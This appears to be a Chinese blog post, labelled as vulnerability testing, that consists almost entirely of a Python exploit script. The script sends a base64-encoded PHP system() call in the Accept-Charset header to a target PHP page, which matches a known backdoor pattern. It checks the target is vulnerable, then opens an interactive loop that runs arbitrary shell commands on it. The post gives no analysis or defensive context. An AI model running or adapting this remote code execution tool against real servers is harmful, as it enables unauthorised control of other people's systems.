基于网站的漏洞测试

Feng_Blue_

于 2021-09-22 09:39:00 发布

阅读量110

点赞数 1

文章标签： python

本文链接：https://blog.youkuaiyun.com/Feng_Blue_/article/details/120408724

版权


import base64
import sys
import string
import requests
import random



url = "http://192.168.8.135/ll.php"


def rce(url,cmd):
    cmd = base64.b64encode("system('{}');".format(cmd).encode()).decode()
    headers = {
        "Accept-Charset"   : cmd,
        "Accept-Encoding"  : "gzip,deflate",
        "User-Agent"       : "Feng"
    }

    res = requests.get(url = url, headers = headers)

    bof = 0
    dof = res.text.index("<!DOCTYPE html")

    return (res.content[bof:dof].decode('gb2312'))

def mAth():
    b = ''
    for h in range(10):
        h
        b += random.choice(string.digits + string.ascii_letters)
    return b

oath = mAth()

cmd = "echo " + oath

print("目标网址:" + url )

if oath not in rce(url, cmd):
    exit("貌似并没有什么发现")

print("貌似有发现，尝试一下？")

try:

    while True:
        cmd = input("(p≧w≦q)>cmd >:")

        if cmd == "q":
            break

        print(rce(url,cmd))

except KeyboardInterrupt as p:
    print("程序终止")